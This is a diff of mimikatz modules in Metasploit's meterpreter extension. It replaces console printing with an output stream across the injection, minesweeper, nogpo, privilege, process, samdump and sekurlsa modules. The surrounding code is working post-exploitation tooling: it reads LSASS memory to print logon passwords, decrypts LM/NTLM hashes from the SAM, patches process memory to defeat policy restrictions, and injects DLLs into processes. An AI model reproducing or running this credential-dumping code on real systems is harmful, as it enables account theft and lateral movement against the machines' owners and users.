@ -76,32 +76,32 @@ bool mod_mimikatz_inject::injectInPid(DWORD & pid, wstring & libPath, bool isCom
wstring monBuffer = L"";
monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
wcout << L"Attente de connexion du client..." << endl;
(*outputStream) << L"Attente de connexion du client..." << endl;
if(monCommunicator->createServer())
{
wcout << L"Serveur connecté à un client !" << endl;
(*outputStream) << L"Serveur connecté à un client !" << endl;
if(monCommunicator->readFromPipe(monBuffer))
{
wcout << L"Message du processus :" << endl << monBuffer << endl;
(*outputStream) << L"Message du processus :" << endl << monBuffer << endl;
}
else
{
wcout << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl;
(*outputStream) << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl;
closeThisCommunicator();
}
}
else
{
wcout << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl;
(*outputStream) << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl;
closeThisCommunicator();
}
}
else
wcout << L"Injecté sans communication (legacy)" << endl;
} else wcout << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl;
(*outputStream) << L"Injecté sans communication (legacy)" << endl;
} else (*outputStream) << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl;
}
else wcout << L"Erreur : un canal de communicaton est déjà ouvert" << endl;
else (*outputStream) << L"Erreur : un canal de communicaton est déjà ouvert" << endl;
return reussite;
}
@ -111,7 +111,7 @@ bool mod_mimikatz_inject::closeThisCommunicator()
{
if(monCommunicator)
{
wcout << L"Fermeture du canal de communication" << endl;
(*outputStream) << L"Fermeture du canal de communication" << endl;
delete monCommunicator;
monCommunicator = NULL;
}

20
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_minesweeper.cpp
View File

@ -29,7 +29,7 @@ bool mod_mimikatz_minesweeper::infos(vector<wstring> * arguments)
STRUCT_MINESWEEPER_BOARD monBoard;
if(mod_memory::readMemory(monGame.pBoard, &monBoard, sizeof(STRUCT_MINESWEEPER_BOARD), maStruct->hMineSweeper))
{
wcout << L"Mines : " << monBoard.nbMines << endl <<
(*outputStream) << L"Mines : " << monBoard.nbMines << endl <<
L"Dimension : " << monBoard.nbLignes << L" lignes x " << monBoard.nbColonnes << L" colonnes" << endl <<
L"Champ : " << endl << endl;
@ -43,15 +43,15 @@ bool mod_mimikatz_minesweeper::infos(vector<wstring> * arguments)
for(DWORD l = 0; l < monBoard.nbLignes; l++)
{
wcout << L'\t';
(*outputStream) << L'\t';
for(DWORD c = 0; c < monBoard.nbColonnes; c++)
wcout << monTableau[l][c] << L' ';
wcout << endl;
(*outputStream) << monTableau[l][c] << L' ';
(*outputStream) << endl;
delete[] monTableau[l];
}
delete[] monTableau;
} else wcout << L"Impossible de lire les données du plateau" << endl;
} else wcout << L"Impossible de lire les données du jeu" << endl;
} else (*outputStream) << L"Impossible de lire les données du plateau" << endl;
} else (*outputStream) << L"Impossible de lire les données du jeu" << endl;
CloseHandle(maStruct->hMineSweeper);
}
delete maStruct;
@ -84,13 +84,13 @@ bool mod_mimikatz_minesweeper::parseField(structHandleAndAddr * monHandleAndAddr
else
if(reinterpret_cast<BYTE *>(cellules)[l]) monTableau[l][c] = '*';
}
} else wcout << L"Impossible de lire les élements de la colonne : " << c << endl;
} else (*outputStream) << L"Impossible de lire les élements de la colonne : " << c << endl;
delete[] cellules;
} else wcout << L"Impossible de lire les références de la colonne : " << c << endl;
} else (*outputStream) << L"Impossible de lire les références de la colonne : " << c << endl;
}
} else wcout << L"Impossible de lire les références des colonnes" << endl;
} else (*outputStream) << L"Impossible de lire les références des colonnes" << endl;
delete[] ref_colonnes_elements;
} else wcout << L"Impossible de lire les références de l\'élement" << endl;
} else (*outputStream) << L"Impossible de lire les références de l\'élement" << endl;
return true;
}

40
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_nogpo.cpp
View File

@ -17,19 +17,19 @@ vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_nogpo::getMimiKatzComman
bool mod_mimikatz_nogpo::regedit(vector<wstring> * arguments)
{
wcout << L"Editeur de registre : " << (disableSimple(L"regedit.exe", L"DisableRegistryTools", L"KiwiAndRegistryTools") ? "OK" : "KO") << endl;
(*outputStream) << L"Editeur de registre : " << (disableSimple(L"regedit.exe", L"DisableRegistryTools", L"KiwiAndRegistryTools") ? "OK" : "KO") << endl;
return true;
}
bool mod_mimikatz_nogpo::cmd(vector<wstring> * arguments)
{
wcout << L"Invite de commande : " << (disableSimple(L"cmd.exe", L"DisableCMD", L"KiwiAndCMD") ? "OK" : "KO") << endl;
(*outputStream) << L"Invite de commande : " << (disableSimple(L"cmd.exe", L"DisableCMD", L"KiwiAndCMD") ? "OK" : "KO") << endl;
return true;
}
bool mod_mimikatz_nogpo::taskmgr(vector<wstring> * arguments)
{
wcout << L"Gestionnaire de taches : " << (disableSimple(L"taskmgr.exe", L"DisableTaskMgr", L"KiwiAndTaskMgr") ? "OK" : "KO") << endl;
(*outputStream) << L"Gestionnaire de taches : " << (disableSimple(L"taskmgr.exe", L"DisableTaskMgr", L"KiwiAndTaskMgr") ? "OK" : "KO") << endl;
return true;
}
@ -45,12 +45,12 @@ bool mod_mimikatz_nogpo::olpst(vector<wstring> * arguments)
DWORD pidOutlook = 0;
bool reussite = disableSimple(pathToOutlook, szDisable, szKiwi, &pidOutlook);
wcout << L"Outlook avec PST : " << (reussite ? L"OK" : L"KO");
(*outputStream) << L"Outlook avec PST : " << (reussite ? L"OK" : L"KO");
if(reussite)
{
mod_patch::patchModuleOfPID(pidOutlook, L"olmapi32.dll", reinterpret_cast<BYTE *>(szDisable), sizeof(szDisable), reinterpret_cast<BYTE *>(szKiwi), sizeof(szKiwi));
}
} else wcout << L"Outlook introuvable" << endl;
} else (*outputStream) << L"Outlook introuvable" << endl;
return true;
}
@ -112,18 +112,18 @@ bool mod_mimikatz_nogpo::getApplicationPathFromCLSID(wstring application, wstrin
if(reussite = (regError == ERROR_SUCCESS))
{
path->assign(reinterpret_cast<wchar_t *>(monPath));
} else wcout << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl;
} else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl;
delete[] monPath;
} else wcout << "Le type retourné par \'" << monPath << "\' n\'est pas : REG_SZ" << endl;
} else wcout << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl;
} else (*outputStream) << "Le type retourné par \'" << monPath << "\' n\'est pas : REG_SZ" << endl;
} else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl;
RegCloseKey(hApplicationPath);
} else wcout << "RegOpenKeyEx \'" << regPathToPath << "\' : " << mod_system::getWinError(false, regError) << endl;
} else wcout << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl;
} else (*outputStream) << "RegOpenKeyEx \'" << regPathToPath << "\' : " << mod_system::getWinError(false, regError) << endl;
} else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl;
delete[] monGUID;
} else wcout << "Le type retourné par \'" << monGUID << "\' n\'est pas : REG_SZ" << endl;
} else wcout << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl;
} else (*outputStream) << "Le type retourné par \'" << monGUID << "\' n\'est pas : REG_SZ" << endl;
} else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl;
RegCloseKey(hApplication);
} else wcout << "RegOpenKeyEx \'" << pathToApplication << "\' : " << mod_system::getWinError(false, regError) << endl;
} else (*outputStream) << "RegOpenKeyEx \'" << pathToApplication << "\' : " << mod_system::getWinError(false, regError) << endl;
return reussite;
}
@ -145,17 +145,17 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, SIZE_T taillePattern
{
if(!(reussite = mod_memory::writeMemory(patternAddr, maCleFinale, taillePattern, mesInfos->hProcess)))
{
wcout << L"mod_memory::writeMemory " << mod_system::getWinError() << endl;
(*outputStream) << L"mod_memory::writeMemory " << mod_system::getWinError() << endl;
}
}
else wcout << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl;
}
else wcout << L"mod_process::getPeb " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getPeb " << mod_system::getWinError() << endl;
delete monPeb;
if(!(ResumeThread(mesInfos->hThread) != -1))
wcout << L"ResumeThread " << mod_system::getWinError() << endl;
(*outputStream) << L"ResumeThread " << mod_system::getWinError() << endl;
if(monPID)
{
@ -167,7 +167,7 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, SIZE_T taillePattern
CloseHandle(mesInfos->hThread);
CloseHandle(mesInfos->hProcess);
}
else wcout << L"mod_process::execProcess " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::execProcess " << mod_system::getWinError() << endl;
delete mesInfos;
@ -186,7 +186,7 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, wstring origKey, wst
reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID);
}
else wcout << L"mod_mimikatz_nogpo::disableSimple (unicode) Taille du pattern original différente du pattern cible" << endl;
else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (unicode) Taille du pattern original différente du pattern cible" << endl;
return reussite;
}
@ -203,7 +203,7 @@ bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, string origKey, stri
reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID);
}
else wcout << L"mod_mimikatz_nogpo::disableSimple (non-unicode) Taille du pattern original différente du pattern cible" << endl;
else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (non-unicode) Taille du pattern original différente du pattern cible" << endl;
return reussite;
}

30
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_privilege.cpp
View File

@ -45,7 +45,7 @@ bool mod_mimikatz_privilege::simplePriv(wstring priv, vector<wstring> * argument
{
bool ajout = arguments->empty();
wcout << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : ";
(*outputStream) << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilège : " << priv << L" : ";
vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>;
mesPrivs->push_back(make_pair(priv, ajout ? SE_PRIVILEGE_ENABLED : 0));
@ -54,10 +54,10 @@ bool mod_mimikatz_privilege::simplePriv(wstring priv, vector<wstring> * argument
delete mesPrivs;
if(reussite)
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"KO ; " << mod_system::getWinError();
(*outputStream) << endl;
return reussite;
}
@ -74,10 +74,10 @@ bool mod_mimikatz_privilege::multiplePrivs(vector<wstring> * privs, DWORD type)
delete mesPrivs;
if(reussite)
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"KO ; " << mod_system::getWinError();
(*outputStream) << endl;
return reussite;
}
@ -91,40 +91,40 @@ bool mod_mimikatz_privilege::list(vector<wstring> * arguments)
{
for(vector<pair<wstring, DWORD>>::iterator monPrivilege = mesPrivs->begin(); (monPrivilege != mesPrivs->end()) ; monPrivilege++)
{
wcout << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t';
(*outputStream) << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t';
if(monPrivilege->second & SE_PRIVILEGE_VALID_ATTRIBUTES)
{
if(monPrivilege->second & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
{
wcout << L"ENABLED_BY_DEFAULT ";
(*outputStream) << L"ENABLED_BY_DEFAULT ";
}
if(monPrivilege->second & SE_PRIVILEGE_ENABLED)
{
wcout << L"ENABLED ";
(*outputStream) << L"ENABLED ";
}
if(monPrivilege->second & SE_PRIVILEGE_REMOVED)
{
wcout << L"REMOVED ";
(*outputStream) << L"REMOVED ";
}
if(monPrivilege->second & SE_PRIVILEGE_USED_FOR_ACCESS)
{
wcout << L"USED_FOR_ACCESS ";
(*outputStream) << L"USED_FOR_ACCESS ";
}
if(monPrivilege->second & SE_PRIVILEGE_REMOVED)
{
wcout << L"REMOVED";
(*outputStream) << L"REMOVED";
}
}
wcout << endl;
(*outputStream) << endl;
}
}
else wcout << mod_system::getWinError() << endl;
else (*outputStream) << mod_system::getWinError() << endl;
return true;
}

80
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_process.cpp
View File

@ -26,7 +26,7 @@ bool mod_mimikatz_process::start(vector<wstring> * arguments)
bool paused = false;
bool sudo = false;
wcout << L"Demande d\'exécution de : \'" << commande << L"'" << endl;
(*outputStream) << L"Demande d\'exécution de : \'" << commande << L"'" << endl;
PROCESS_INFORMATION pi = {INVALID_HANDLE_VALUE, INVALID_HANDLE_VALUE, 0, 0};
switch(arguments->size())
@ -57,19 +57,19 @@ bool mod_mimikatz_process::start(vector<wstring> * arguments)
if(mod_process::start(&commande, &pi, paused, sudo))
{
if(paused)
wcout << L" * Le Thread principal est suspendu ! Reprise avec : thread::resume " << pi.dwThreadId << endl;
(*outputStream) << L" * Le Thread principal est suspendu ! Reprise avec : thread::resume " << pi.dwThreadId << endl;
if(sudo)
wcout << L" * Le processus est démarré avec de fausses données d\'identification" << endl;
(*outputStream) << L" * Le processus est démarré avec de fausses données d\'identification" << endl;
printInfosFromPid(pi.dwProcessId, pi.dwThreadId);
}
else wcout << L"mod_process::start ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::start ; " << mod_system::getWinError() << endl;
}
else
{
doStartProcess_syntaxerror:
wcout << L"Erreur de syntaxe ; " << L"process::start [/paused] [/sudo] commande" << endl;
(*outputStream) << L"Erreur de syntaxe ; " << L"process::start [/paused] [/sudo] commande" << endl;
}
return true;
@ -84,14 +84,14 @@ bool mod_mimikatz_process::stop(vector<wstring> * arguments)
if(mod_process::getUniqueForName(&monProcess, &procName))
{
wcout << L"Fin de : " << procName << L'\t';
(*outputStream) << L"Fin de : " << procName << L'\t';
if(mod_process::stop(monProcess.th32ProcessID))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_process::stop ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"KO - mod_process::stop ; " << mod_system::getWinError();
(*outputStream) << endl;
}
else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
}
return true;
@ -107,14 +107,14 @@ bool mod_mimikatz_process::suspend(vector<wstring> * arguments)
if(mod_process::getUniqueForName(&monProcess, &procName))
{
wcout << L"Suspension de : " << procName << L'\t';
(*outputStream) << L"Suspension de : " << procName << L'\t';
if(mod_process::suspend(monProcess.th32ProcessID))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_process::suspend ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"KO - mod_process::suspend ; " << mod_system::getWinError();
(*outputStream) << endl;
}
else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
}
return true;
@ -130,14 +130,14 @@ bool mod_mimikatz_process::resume(vector<wstring> * arguments)
if(mod_process::getUniqueForName(&monProcess, &procName))
{
wcout << L"Reprise de : " << procName << L'\t';
(*outputStream) << L"Reprise de : " << procName << L'\t';
if(mod_process::resume(monProcess.th32ProcessID))
wcout << L"OK";
(*outputStream) << L"OK";
else
wcout << L"KO - mod_process::resume ; " << mod_system::getWinError();
wcout << endl;
(*outputStream) << L"KO - mod_process::resume ; " << mod_system::getWinError();
(*outputStream) << endl;
}
else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
}
return true;
@ -151,10 +151,10 @@ bool mod_mimikatz_process::list(vector<wstring> * arguments)
vector<mod_process::KIWI_PROCESSENTRY32> * vectorProcess = new vector<mod_process::KIWI_PROCESSENTRY32>();
if(mod_process::getList(vectorProcess))
{
wcout << L"PID\tPPID\t#Ths\tpri\timage" << endl;
(*outputStream) << L"PID\tPPID\t#Ths\tpri\timage" << endl;
for(vector<mod_process::KIWI_PROCESSENTRY32>::iterator monProcess = vectorProcess->begin(); monProcess != vectorProcess->end(); monProcess++)
{
wcout <<
(*outputStream) <<
setw(5) << setfill(wchar_t(' ')) << monProcess->th32ProcessID << L'\t' <<
setw(5) << setfill(wchar_t(' ')) << monProcess->th32ParentProcessID << L'\t' <<
setw(5) << setfill(wchar_t(' ')) << monProcess->cntThreads << L'\t' <<
@ -163,7 +163,7 @@ bool mod_mimikatz_process::list(vector<wstring> * arguments)
endl;
}
}
else wcout << L"mod_process::getList ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getList ; " << mod_system::getWinError() << endl;
delete vectorProcess;
return true;
@ -183,14 +183,14 @@ bool mod_mimikatz_process::modules(vector<wstring> * arguments)
vector<mod_process::KIWI_MODULEENTRY32> * vectorModules = new vector<mod_process::KIWI_MODULEENTRY32>();
if(mod_process::getModulesListForProcessId(vectorModules, &processId))
{
wcout << L"@Base\tTaille\tModule\tPath" << endl;
(*outputStream) << L"@Base\tTaille\tModule\tPath" << endl;
for(vector<mod_process::KIWI_MODULEENTRY32>::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++)
{
wcout << monModule->modBaseAddr << L'\t' << monModule->modBaseSize << '\t' << monModule->szModule << L'\t' << monModule->szExePath << endl;
(*outputStream) << monModule->modBaseAddr << L'\t' << monModule->modBaseSize << '\t' << monModule->szModule << L'\t' << monModule->szExePath << endl;
}
}
else
wcout << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl;
(*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl;
delete vectorModules;
return true;
@ -229,7 +229,7 @@ bool mod_mimikatz_process::iat(vector<wstring> * arguments)
{
printIATFromModule(monModule, monHandle);
}
else wcout << L"mod_process::getUniqueModuleForName ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueModuleForName ; " << mod_system::getWinError() << endl;
delete monModule;
}
else
@ -240,7 +240,7 @@ bool mod_mimikatz_process::iat(vector<wstring> * arguments)
for(vector<mod_process::KIWI_MODULEENTRY32>::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++)
printIATFromModule(&*monModule, monHandle);
}
else wcout << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl;
delete vectorModules;
}
@ -248,32 +248,32 @@ bool mod_mimikatz_process::iat(vector<wstring> * arguments)
CloseHandle(monHandle);
}
}
else wcout << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl;
return true;
}
void mod_mimikatz_process::printInfosFromPid(DWORD &PID, DWORD ThreadId)
{
wcout << L"PID : " << PID << endl;
(*outputStream) << L"PID : " << PID << endl;
if(ThreadId)
{
wcout << L"ThreadID : " << ThreadId << endl;
(*outputStream) << L"ThreadID : " << ThreadId << endl;
}
LUID monId = {0, 0};
if(mod_process::getAuthentificationIdFromProcessId(PID, monId))
{
wcout << "AuthId_h : " << monId.HighPart << endl;
wcout << "AuthId_l : " << monId.LowPart << endl;
(*outputStream) << "AuthId_h : " << monId.HighPart << endl;
(*outputStream) << "AuthId_l : " << monId.LowPart << endl;
}
else wcout << L"Erreur : " << mod_system::getWinError() << endl;
else (*outputStream) << L"Erreur : " << mod_system::getWinError() << endl;
}
void mod_mimikatz_process::printIATFromModule(mod_process::KIWI_MODULEENTRY32 * monModule, HANDLE monHandle)
{
wcout << monModule->szModule << L" -> " << monModule->szExePath << endl;
(*outputStream) << monModule->szModule << L" -> " << monModule->szExePath << endl;
PBYTE baseAddr = reinterpret_cast<PBYTE>(monModule->modBaseAddr);
vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>> * monIAT = new vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>>();
@ -281,15 +281,15 @@ void mod_mimikatz_process::printIATFromModule(mod_process::KIWI_MODULEENTRY32 *
{
for(vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>>::iterator monModuleImporte = monIAT->begin(); monModuleImporte != monIAT->end(); monModuleImporte++)
{
wcout << L" - Imports depuis : " << monModuleImporte->first.c_str() << endl;
(*outputStream) << L" - Imports depuis : " << monModuleImporte->first.c_str() << endl;
for(vector<mod_process::KIWI_IAT_MODULE>::iterator maFonctionImporte = monModuleImporte->second.begin(); maFonctionImporte != monModuleImporte->second.end(); maFonctionImporte++)
{
wcout << L" " << maFonctionImporte->ptrToFunc << L" -> " << maFonctionImporte->ptrFunc << L' ';
(*outputStream) << L" " << maFonctionImporte->ptrToFunc << L" -> " << maFonctionImporte->ptrFunc << L' ';
if(maFonctionImporte->Ordinal != 0)
wcout << L"O# " << maFonctionImporte->Ordinal;
(*outputStream) << L"O# " << maFonctionImporte->Ordinal;
else
wcout << maFonctionImporte->funcName.c_str();
wcout << endl;
(*outputStream) << maFonctionImporte->funcName.c_str();
(*outputStream) << endl;
}
}
}

30
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_samdump.cpp
View File

@ -31,7 +31,7 @@ bool mod_mimikatz_samdump::full(vector<wstring> * arguments)
if(getInfosFromHive(arguments->front().c_str(), bootkey))
{
if(!getUsersAndHashesFromHive(arguments->back().c_str(), bootkey))
wcout << L"Erreur lors de l\'exploration des ruches" << endl;
(*outputStream) << L"Erreur lors de l\'exploration des ruches" << endl;
}
}
else
@ -39,7 +39,7 @@ bool mod_mimikatz_samdump::full(vector<wstring> * arguments)
if(getInfosFromReg(bootkey))
{
if(!getUsersAndHashesFromReg(bootkey))
wcout << L"Erreur lors de l\'exploration du registre" << endl;
(*outputStream) << L"Erreur lors de l\'exploration du registre" << endl;
}
}
return true;
@ -127,11 +127,11 @@ bool mod_mimikatz_samdump::getInfosFromHive(wstring systemHive, unsigned char bo
wstring * computerName = new wstring();
if(getComputerNameFromHive(monHive, fullControlSet, computerName))
wcout << L"Ordinateur : " << *computerName << endl;
(*outputStream) << L"Ordinateur : " << *computerName << endl;
delete computerName;
if(reussite = getBootKeyFromHive(monHive, fullControlSet, bootkey))
wcout << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl;
(*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl;
delete fullControlSet;
}
}
@ -213,12 +213,12 @@ bool mod_mimikatz_samdump::getBootKeyFromReg(BYTE bootkey[0x10])
code = RegQueryInfoKey(monSecret, monBuffer, &maTaille, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
if(code == ERROR_SUCCESS)
swscanf_s(monBuffer, L"%x", (DWORD *) (&key[i * sizeof(DWORD)]));
else wcout << L"RegQueryInfoKey " << kn[i] << " : " << mod_system::getWinError(false, code) << endl;
else (*outputStream) << L"RegQueryInfoKey " << kn[i] << " : " << mod_system::getWinError(false, code) << endl;
RegCloseKey(monSecret);
} else wcout << L"RegOpenKeyEx " << kn[i] << " : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegOpenKeyEx " << kn[i] << " : " << mod_system::getWinError(false, code) << endl;
}
RegCloseKey(monLSA);
} else wcout << L"RegOpenKeyEx LSA : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegOpenKeyEx LSA : " << mod_system::getWinError(false, code) << endl;
if(reussite = (code == ERROR_SUCCESS))
mod_hash::getBootKeyFromKey(bootkey, key);
@ -253,11 +253,11 @@ bool mod_mimikatz_samdump::getInfosFromReg(BYTE bootkey[0x10])
wstring * computerName = new wstring();
if(mod_system::getComputerName(computerName))
wcout << L"Ordinateur : " << *computerName << endl;
(*outputStream) << L"Ordinateur : " << *computerName << endl;
delete computerName;
if(reussite = getBootKeyFromReg(bootkey))
wcout << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl;
(*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl;
return reussite;
}
@ -321,18 +321,18 @@ bool mod_mimikatz_samdump::getUsersAndHashesFromReg(BYTE bootkey[0x10])
RegCloseKey(monUser);
}
}
} else wcout << L"RegEnumKeyExW : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegEnumKeyExW : " << mod_system::getWinError(false, code) << endl;
}
delete[] monRid;
}
RegCloseKey(mesUsers);
} else wcout << L"RegOpenKeyEx Users : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegOpenKeyEx Users : " << mod_system::getWinError(false, code) << endl;
}
} else wcout << L"RegQueryValueEx 2 F : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegQueryValueEx 2 F : " << mod_system::getWinError(false, code) << endl;
delete[] bufferF;
} else wcout << L"RegQueryValueEx 1 F : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegQueryValueEx 1 F : " << mod_system::getWinError(false, code) << endl;
RegCloseKey(maSAM);
} else wcout << L"RegOpenKeyEx SAM : " << mod_system::getWinError(false, code) << endl;
} else (*outputStream) << L"RegOpenKeyEx SAM : " << mod_system::getWinError(false, code) << endl;
return reussite;
}
@ -342,7 +342,7 @@ void mod_mimikatz_samdump::infosFromUserAndKey(mod_hash::USER_F * userF, mod_has
wstring hashLM, hashNTLM;
mod_hash::decryptHash(&hashLM, hBootKey, userV, &userV->LM, userF->UserId, false);
mod_hash::decryptHash(&hashNTLM, hBootKey, userV, &userV->NTLM, userF->UserId, true);
wcout << endl <<
(*outputStream) << endl <<
L"Rid : " << userF->UserId << endl <<
L"User : " << wstring((wchar_t *) (&(userV->datas) + userV->Username.offset), userV->Username.lenght / sizeof(wchar_t)) << endl <<
L"LM : " << hashLM << endl <<

32
c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_sekurlsa.cpp
View File

@ -34,7 +34,7 @@ bool mod_mimikatz_sekurlsa::getLogonPasswords(vector<wstring> * arguments)
if(searchLSASSDatas())
getLogonData(arguments, &GLOB_ALL_Providers);
else
wcout << L"Données LSASS en erreur" << endl;
(*outputStream) << L"Données LSASS en erreur" << endl;
return true;
}
@ -103,12 +103,12 @@ bool mod_mimikatz_sekurlsa::searchLSASSDatas()
}
}
} else {
wcout << L"mod_process::getVeryBasicModulesListForProcess : " << mod_system::getWinError() << endl;
(*outputStream) << L"mod_process::getVeryBasicModulesListForProcess : " << mod_system::getWinError() << endl;
CloseHandle(hLSASS);
hLSASS = NULL;
}
} else wcout << L"OpenProcess : " << mod_system::getWinError() << endl;
} else wcout << L"mod_process::getUniqueForName : " << mod_system::getWinError() << endl;
} else (*outputStream) << L"OpenProcess : " << mod_system::getWinError() << endl;
} else (*outputStream) << L"mod_process::getUniqueForName : " << mod_system::getWinError() << endl;
}
if(hLSASS)
@ -206,26 +206,26 @@ void mod_mimikatz_sekurlsa::genericCredsToStream(PKIWI_GENERIC_PRIMARY_CREDENTIA
if(justSecurity)
{
if(!pos)
wcout << password;
(*outputStream) << password;
else
wcout << endl <<
(*outputStream) << endl <<
L"\t [" << *pos << L"] { " << rUserName << L" ; " << rDomainName << L" ; " << password << L" }";
}
else
{
if(!pos)
wcout << endl <<
(*outputStream) << endl <<
L"\t * Utilisateur : " << rUserName << endl <<
L"\t * Domaine : " << rDomainName << endl <<
L"\t * Mot de passe : " << password;
else
wcout << endl <<
(*outputStream) << endl <<
L"\t * [" << *pos << L"] Utilisateur : " << rUserName << endl <<
L"\t Domaine : " << rDomainName << endl <<
L"\t Mot de passe : " << password;
}
}
} else wcout << L"n.t. (LUID KO)";
} else (*outputStream) << L"n.t. (LUID KO)";
}
bool mod_mimikatz_sekurlsa::getLogonData(vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders)
@ -242,7 +242,7 @@ bool mod_mimikatz_sekurlsa::getLogonData(vector<wstring> * mesArguments, vector<
{
if(sessionData->LogonType != Network)
{
wcout << endl <<
(*outputStream) << endl <<
L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl <<
L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl <<
L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl <<
@ -250,18 +250,18 @@ bool mod_mimikatz_sekurlsa::getLogonData(vector<wstring> * mesArguments, vector<
for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++)
{
wcout << L'\t' << monProvider->second << (mesArguments->empty() ? (L" :") : (L"")) << L'\t';
(*outputStream) << L'\t' << monProvider->second << (mesArguments->empty() ? (L" :") : (L"")) << L'\t';
monProvider->first(&sessions[i], mesArguments->empty());
wcout << endl;
(*outputStream) << endl;
}
}
LsaFreeReturnBuffer(sessionData);
}
else wcout << L"Erreur : Impossible d\'obtenir les données de session" << endl;
else (*outputStream) << L"Erreur : Impossible d\'obtenir les données de session" << endl;
}
LsaFreeReturnBuffer(sessions);
}
else wcout << L"Erreur : Impossible d\'énumerer les sessions courantes" << endl;
else (*outputStream) << L"Erreur : Impossible d\'énumerer les sessions courantes" << endl;
return true;
}
